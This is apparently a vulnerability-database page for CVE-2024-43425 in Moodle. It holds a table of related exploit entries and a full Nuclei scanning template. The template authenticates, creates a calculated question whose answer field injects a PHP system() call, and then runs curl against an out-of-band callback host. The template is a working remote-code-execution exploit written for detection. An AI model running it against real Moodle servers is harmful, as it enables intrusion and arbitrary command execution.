| Reporter | Title | Published | Views | Family All 56 |
|---|---|---|---|---|
| Exploit for Code Injection in Moodle | 13 Oct 202502:32 | – | githubexploit | |
| Exploit for Code Injection in Moodle | 13 Jul 202504:52 | – | githubexploit | |
| Exploit for Code Injection in Moodle | 7 Feb 202519:48 | – | githubexploit | |
| Exploit for Code Injection in Moodle | 28 Jun 202508:49 | – | githubexploit | |
| The vulnerability of the virtual learning environment Moodle, which exists due to the lack of measures taken to protect the structure of the web page, allows a hacker to execute arbitrary code. | 30 Aug 202400:00 | – | bdu_fstec | |
| CVE-2024-43425 | 28 Aug 202409:02 | – | circl | |
| Moodle 安全漏洞 | 7 Nov 202400:00 | – | cnnvd | |
| CVE-2024-43425 | 7 Nov 202413:21 | – | cve | |
| CVE-2024-43425 Moodle: remote code execution via calculated question types | 7 Nov 202413:21 | – | cvelist | |
| Moodle 4.4.0 - Authenticated Remote Code Execution | 2 Jul 202500:00 | – | exploitdb |
id: CVE-2024-43425
info:
name: Moodle - Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
Attackers with the permission to create or modify questions in Moodle courses are able to craft malicious inputs for calculated questions, which can be abused to execute arbitrary commands on the underlying system.
impact: |
Authenticated attackers with question creation permissions can craft malicious calculated questions to execute arbitrary commands on the underlying system.
remediation: |
Apply security patches for Moodle addressing CVE-2024-43425.
reference:
- https://github.com/RedTeamPentesting/moodle-rce-calculatedquestions
- https://blog.redteam-pentesting.de/2024/moodle-rce/
- https://www.redteam-pentesting.de/en/advisories/rt-sa-2024-009/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43425
classification:
cvss-score: 9.8
cve-id: CVE-2024-43425
epss-score: 0.83343
epss-percentile: 0.99643
cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: title:"Moodle"
product: moodle
vendor: moodle
tags: cve,cve2024,moodle,rce,authenticated,vuln
flow: http(1) && http(2) && http(3) && http(4) && http(5) && http(6)
http:
- raw:
- |
GET /login/index.php HTTP/1.1
Host: {{Hostname}}
- |
POST /login/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
anchor=&logintoken={{token}}&username={{username}}&password={{password}}
host-redirects: true
extractors:
- type: regex
part: body
name: token
group: 1
regex:
- 'name="logintoken" value="([a-zA-Z0-9]+)">'
internal: true
- raw:
- |
GET /my/courses.php HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: sesskey
part: body
internal: true
group: 1
regex:
- '"sesskey":"([^"]+)"'
- raw:
- |
POST /lib/ajax/service.php?sesskey={{sesskey}}&info=core_course_get_enrolled_courses_by_timeline_classification HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
[{"index":0,"methodname":"core_course_get_enrolled_courses_by_timeline_classification","args":{"offset":0,"limit":0,"classification":"all","sort":"fullname","customfieldname":"","customfieldvalue":"","requiredfields":["id","fullname","shortname","showcoursecategory","showshortname","visible","enddate"]}}]
extractors:
- type: json
part: body
name: courseid
json:
- ".[].data.courses[0].id"
internal: true
- raw:
- |
POST /question/bank/editquestion/question.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
initialcategory=1&reload=1&shuffleanswers=1&answernumbering=abc&mform_isexpanded_id_answerhdr=1&noanswers=1&nounits=1&numhints=2&synchronize=&wizard=datasetdefinitions&id=&inpopup=0&cmid=&courseid={{courseid}}&returnurl=%2Fquestion%2Fedit.php%3Fcourseid%3D2%26deleteall%3D1&mdlscrollto=0&appendqnumstring=&qtype=calculated&makecopy=0&sesskey={{sesskey}}&_qf__qtype_calculated_edit_form=1&mform_isexpanded_id_generalheader=1&mform_isexpanded_id_unithandling=1&mform_isexpanded_id_unithdr=1&mform_isexpanded_id_multitriesheader=1&mform_isexpanded_id_tagsheader=1&category=2%2C11&name=aaaaaaa&questiontext%5Btext%5D=%3Cp%3Edsaszzzzzzzzda%3C%2Fp%3E&questiontext%5Bformat%5D=1&questiontext%5Bitemid%5D=471779994&status=ready&defaultmark=1&generalfeedback%5Btext%5D=&generalfeedback%5Bformat%5D=1&generalfeedback%5Bitemid%5D=318048148&idnumber=&answer%5B0%5D=%281%29-%3E%7Bsystem%28%24_GET%5Bchr%2897%29%5D%29%7D&fraction%5B0%5D=1.0&tolerance%5B0%5D=0.01&tolerancetype%5B0%5D=1&correctanswerlength%5B0%5D=2&correctanswerformat%5B0%5D=1&feedback%5B0%5D%5Btext%5D=&feedback%5B0%5D%5Bformat%5D=1&feedback%5B0%5D%5Bitemid%5D=238751667&unitrole=3&penalty=0.3333333&hint%5B0%5D%5Btext%5D=%3Cp%3Eas%3C%2Fp%3E&hint%5B0%5D%5Bformat%5D=1&hint%5B0%5D%5Bitemid%5D=653998899&hint%5B1%5D%5Btext%5D=&hint%5B1%5D%5Bformat%5D=1&hint%5B1%5D%5Bitemid%5D=161289221&tags=_qf__force_multiselect_submission&submitbutton=Save+changes
extractors:
- type: regex
part: header
name: id
group: 1
internal: true
regex:
- "&id=([0-9]+)&"
- raw:
- |
POST /question/bank/editquestion/question.php?wizardnow=datasetdefinitions HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
id={{id}}&inpopup=0&cmid=&courseid={{courseid}}&returnurl=%2Fquestion%2Fedit.php%3Fcourseid%3D2%26deleteall%3D1&mdlscrollto=0&appendqnumstring=&category=2%2C11&wizard=datasetitems&sesskey={{sesskey}}&_qf__question_dataset_dependent_definitions_form=1&dataset%5B0%5D=0&synchronize=0&submitbutton=Next+page
extractors:
- type: regex
part: header
name: rceurl
group: 1
internal: true
regex:
- "Location: https?://.*?/question/(.*)&returnurl"
- raw:
- |
GET /question/{{rceurl}}&a=curl%20{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: status
status:
- 200
# digest: 4a0a0047304502205c50fe76188490e05563d105d59b6ecd53fb090b989a99ff995ec362a573a0d5022100c7b1c72065dc916d3e417ef74430f9cb5b152976b48a5af1cffde3c790cab0b1:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation